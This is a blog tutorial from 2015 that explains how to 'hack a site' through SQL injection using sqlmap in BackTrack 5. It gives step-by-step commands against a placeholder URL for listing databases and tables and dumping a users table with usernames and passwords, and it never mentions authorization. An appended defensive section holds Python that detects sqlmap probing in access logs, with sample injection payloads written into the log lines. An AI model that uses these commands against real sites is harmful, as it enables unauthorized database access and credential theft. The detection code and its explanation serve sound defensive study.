Monday, 2 March 2015

SQLmap in BackTrack 5 Tutorial


Hello again, guys.
Today I'm going to show you how to hack a site that is vulnerable to SQL injection with SQLmap in BackTrack 5.
First of all, open BackTrack > Terminal, then type:
cd /pentest/database/sqlmap
and hit Enter.
Now we are inside the SQLmap directory, so let's start hacking.

####################################################################

The options we will need here are:

+++++++++++++++++++++++++++++++++++++++++
-D <= select the database
-T <= select the table
-C <= select the column
--dbs <= list the database names
--tables <= list the table names
--columns <= list the column names
--dump <= dump the data out of the selected table or column
++++++++++++++++++++++++++++++++++++++++++

###################################################################



Let's start.

Our first command will be (the URL is only an example):
./sqlmap.py -u "http://www.website.com/index.php?id=13" --dbs
It will look like this:


[Image: backtrack1.PNG]


Then we will get the database names, like this:

[Image: backtrack2.PNG]


Now we will ask for the tables in one of those databases: we select the database with "-D" and ask for its tables with "--tables".
So we will type:
./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name --tables
I chose the walnut_live database, so I typed:


[Image: backtrack3.PNG]


The result will be the table names, of course.
It will look like this:


[Image: backtrack4.PNG]


Now we have the tables, and we found the users table!
We select this table with the "-T" option. The database is already selected, so we write the same command again, but replace "--tables" with "-T" table_name (here the "users" table) and then ask for the columns inside that table with "--columns". It will be like:
./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name -T table_name --columns
It will look like this:


[Image: backtrack5.PNG]

Now we will get the results, the columns.
They will come out like this:


[Image: backtrack6.PNG]

As you can see, we got the "id", "pass" and "user" columns.
Now we want the data from them, so we will dump the data with "--dump".
Here we have two ways to get it:
we can dump all the data at once, or select a column and get the data from it.
I will show you how both of them look and how they are used.

First, we can get all the data with this command:
./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name -T table_name --dump
which will get us all the data at once and will look like this:


[Image: backtrack7.PNG]


And the result is:

[Image: backtrack8.PNG]


In the picture I marked the user and pass.
Now we will try getting them one by one with this command:
./sqlmap.py -u "http://www.website.com/index.php?id=13" -D database_name -T table_name -C column_name --dump
For example, I will get user:

User:


[Image: backtrack9.PNG]

Result:


[Image: user.PNG]

And so on for the rest of the data.
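
What the commands in this tutorial leave behind in the target's web-server access log, as an added example that is not part of the original post: a short Python check that flags clients by sqlmap's default User-Agent, by non-numeric values in the id parameter, and by information_schema lookups. The log lines are constructed and simplified, and the combined log format and MySQL-style information_schema metadata are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample (combined log format, documentation IP ranges, simplified payloads).
SAMPLE_LOG = """\
198.51.100.7 - - [02/Mar/2015:10:00:01 +0000] "GET /index.php?id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [02/Mar/2015:10:00:05 +0000] "GET /index.php?id=13%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [02/Mar/2015:10:00:06 +0000] "GET /index.php?id=13%20UNION%20ALL%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 5300 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [02/Mar/2015:10:00:07 +0000] "GET /index.php?id=13%20UNION%20ALL%20SELECT%20table_name%20FROM%20information_schema.tables HTTP/1.1" 200 5300 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# client IP, request target and User-Agent from one combined-log-format line
LOG_LINE = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"'
)

def flag_sqli_probing(log_text, param="id"):
    """Return {client_ip: counters} for clients whose requests look like SQLi probing."""
    flagged = defaultdict(lambda: {"sqlmap_ua": 0, "non_numeric": 0, "schema_enum": 0})
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, target, user_agent = m.groups()
        # parse_qs URL-decodes the value, so %20UNION%20 is seen as " UNION ".
        values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
        if "sqlmap" in user_agent.lower():
            flagged[ip]["sqlmap_ua"] += 1  # default UA; client-controlled, so weak alone
        for value in values:
            if not re.fullmatch(r"[0-9]+", value):
                flagged[ip]["non_numeric"] += 1  # id should only ever be an integer
            if "information_schema" in value.lower():
                flagged[ip]["schema_enum"] += 1  # metadata lookups (MySQL assumption)
    return dict(flagged)

if __name__ == "__main__":
    for ip, counters in flag_sqli_probing(SAMPLE_LOG).items():
        print(ip, counters)
```

The non-numeric check is the one that holds regardless of the User-Agent: a parameter that should only carry an integer, as id=13 does here, has no legitimate reason to carry SQL keywords, and the same allowlist belongs in the application in front of a parameterized query.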
